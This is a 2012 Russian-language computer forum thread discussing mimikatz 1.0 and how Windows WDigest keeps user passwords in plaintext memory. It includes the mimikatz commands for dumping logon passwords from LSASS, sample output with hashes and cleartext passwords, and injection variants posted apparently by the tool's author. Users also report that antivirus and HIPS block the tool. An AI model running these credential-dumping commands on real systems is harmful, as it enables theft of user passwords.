Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Архив » Новости и события Microsoft » Обнаружена опасная уязвимость в Microsoft Windows

 
Настройки темы
Обнаружена опасная уязвимость в Microsoft Windows
exo exo вне форума

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442


Конфигурация

Профиль | Отправить PM | Цитировать


Изменения
Автор: exo
Дата: 01-08-2012
Локальный пользователь может получить доступ к потенциально важным данным. Возможно данная угроза исключена при использовании HIPS
Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.
Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.
Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

privilege::debug
sekurlsa::logonPasswords full

Вывод будет примерно следующим:
Цитата:
Authentification Id : 0;210550
Package d'authentification : Kerberos
Utilisateur principal : user
Domaine d'authentification : domain
msv1_0 :
* Utilisateur : user
* Domaine : domain
* Hash LM : 25d934a376b906731d71060d896b7a46
* Hash NTLM : 13b98a9edbce8ef280527c9dd2725ea0
kerberos :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
wdigest :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
tspkg :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
новость взял отсюда
скачать утилиту можно отсюда

лично проверил (вин 7, 2008 R2) - работает только под администратором. В предыдущей версии утилиты антивирусы с HISP могли блокировать доступ. С неё помощью можно мигрировать пароли пользователей, если нужна очень "тихая" миграция.

-------
Вежливый клиент всегда прав!


Отправлено: 18:50, 21-02-2012

 

Аватара для Rezor666

Ветеран


Сообщения: 2738
Благодарности: 336

Профиль | Сайт | Отправить PM | Цитировать


Тьфу ты блин ) Я уж думал что по интереснее...
Цитата exo:
которые работали до него без перезагрузки компьютера... »
Вот будет кто то стоять со свечкой и ждать пока админ ведет пароль и не дай бог комп ребутнет.
А вообще кому оно нафиг надо? Если человек раздает локального админа всем то он дурак.

-------
"Средства у нас есть. У нас ума не хватает..."


Отправлено: 09:09, 27-07-2012 | #11



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


Цитата Rezor666:
А вообще кому оно нафиг надо? »
компрометация

-------
Вежливый клиент всегда прав!


Отправлено: 10:58, 27-07-2012 | #12


Аватара для winbond

Ветеран


Сообщения: 651
Благодарности: 58

Профиль | Отправить PM | Цитировать


Попробовал на работе. Также получает отлуп. Ни на 7 x86/2008 R2 SP1 не выходит, ни на 2003 R2 x86. Апдейты через wsus. Посмотрел блог повнимательней - автор вроде как пишет что на 70% x86 систем и на 90% x64 чего-то у него не совсем срастается и обещает удивить тех у кого установлена Win 8. Ну-ну, посмотрим...

-------
Меня многие спрашивают, как я живу с тремя головами... На самом деле, я триедин, как Великие Бобы.
Вчера - надо сегодня, сегодня - надо вчера. Жизнь странная штука.


Отправлено: 13:34, 27-07-2012 | #13

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


Цитата winbond:
на 90% x64 чего-то не совсем срастается»
я когда это пробовал зимой - у 100% было. сейчас я попробую у тех, у кого получалось.
проверил - теперь не работает. При этом в дистрибутиве утилиты отсутствовал файл sekurlsa.dll Пришлось заново закачивать, но не помолго

-------
Вежливый клиент всегда прав!


Последний раз редактировалось exo, 27-07-2012 в 14:00.


Отправлено: 13:48, 27-07-2012 | #14


Новый участник


Сообщения: 3
Благодарности: 1

Профиль | Отправить PM | Цитировать


I'm very interested to have feedbacks on your Windows version !

Don't forget this facts :
  • NT 5 - Console
    Код: Выделить весь код
    privilege::debug
    inject::service samss sekurlsa.dll
    ....
  • NT 5 - RDP
    Код: Выделить весь код
    psexec -s cmd
    or
    Код: Выделить весь код
    psexec -s mimikatz
    then
    Код: Выделить весь код
    inject::service samss sekurlsa.dll
    ....
  • NT 6 (Console & RDP, include Win8)
    Код: Выделить весь код
    privilege::debug
    inject::service samss sekurlsa.dll
    ....

Gentil Kiwi (my mail is on http://blog.gentilkiwi.com/contact)

Отправлено: 17:09, 27-07-2012 | #15

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


Цитата gentilkiwi:
inject::service samss sekurlsa.dll »
same: access denied

вообщем, пообщавшись с gentilkiwi выяснилось что запрет появился после установки ESEN NOD 32. У него есть некий модуль HIPS, он и блокирует доступ к файлу.

-------
Вежливый клиент всегда прав!


Последний раз редактировалось exo, 27-07-2012 в 17:55.


Отправлено: 17:19, 27-07-2012 | #16


Новый участник


Сообщения: 3
Благодарности: 1

Профиль | Отправить PM | Цитировать


Like sayed in PM, if security softwares like Antivirus / HIPS / Behavior scans /... lock mimikatz access to LSASS, it's not a mimikatz issue

Don't forget it's a POC tool, not a hack tool

* I've made test on an up to date x64 7, no problem at all
Это сообщение посчитали полезным следующие участники:

Отправлено: 17:56, 27-07-2012 | #17


Новый участник


Сообщения: 3
Благодарности: 1

Профиль | Отправить PM | Цитировать


ESET is not the best HIPS after all

http://img52.imageshack.us/img52/555...0727182837.png

Driver exposed not available at this time.

Отправлено: 20:32, 27-07-2012 | #18

exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


gentilkiwi, can you make screen smaller?
i'll checking this on Monday.

Цитата Rezor666:
Если человек раздает локального админа всем то он дурак. »
тут ещё такой момент. с человеком, который у вас работает, можно договорится. Объяснить ему, что такое хорошо и что такое плохо.
А вот вирусам это не объяснишь. написать вирус, который будет выполнять эти действия - не проблема. поэтому хочется понять, как это работает, чтобы закрыть.

-------
Вежливый клиент всегда прав!


Последний раз редактировалось exo, 27-07-2012 в 21:14.


Отправлено: 21:05, 27-07-2012 | #19


Аватара для winbond

Ветеран


Сообщения: 651
Благодарности: 58

Профиль | Отправить PM | Цитировать


Win 7 x86 - MSE.
2008 R2 - MS Defender
2003 R2 - там да, NOD32 5.
На 8 и 2012 встроенный.

Ни на одном не прокатило. Все ОС обновлены по максимуму - в конторе это несложно, дома тем более.
Резюме: на машине без антивируса, под локальным админом и без перезагрузки. Как-то уже не впечатляет )

-------
Меня многие спрашивают, как я живу с тремя головами... На самом деле, я триедин, как Великие Бобы.
Вчера - надо сегодня, сегодня - надо вчера. Жизнь странная штука.


Отправлено: 21:59, 27-07-2012 | #20



Компьютерный форум OSzone.net » Архив » Новости и события Microsoft » Обнаружена опасная уязвимость в Microsoft Windows

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Вопрос - [решено] сайты с якобы "обнаружена уязвимость" exo Защита компьютерных систем 6 08-03-2011 22:50
Обнаружена новая критическая уязвимость в CSS-подсистеме браузера Internet Explorer OSZone News Новости и события Microsoft 0 14-12-2010 00:30
Microsoft решила не исправлять недавно найденную уязвимость в Windows XP OSZone News Новости и события Microsoft 11 20-09-2009 23:40
В безопасности IE8 снова обнаружена уязвимость OSZone News Новости и события Microsoft 4 23-03-2009 09:17
Microsoft Internet Explorer - обнаружена ошибка... Zluk Microsoft Windows 95/98/Me (архив) 6 31-03-2005 23:41




 
Переход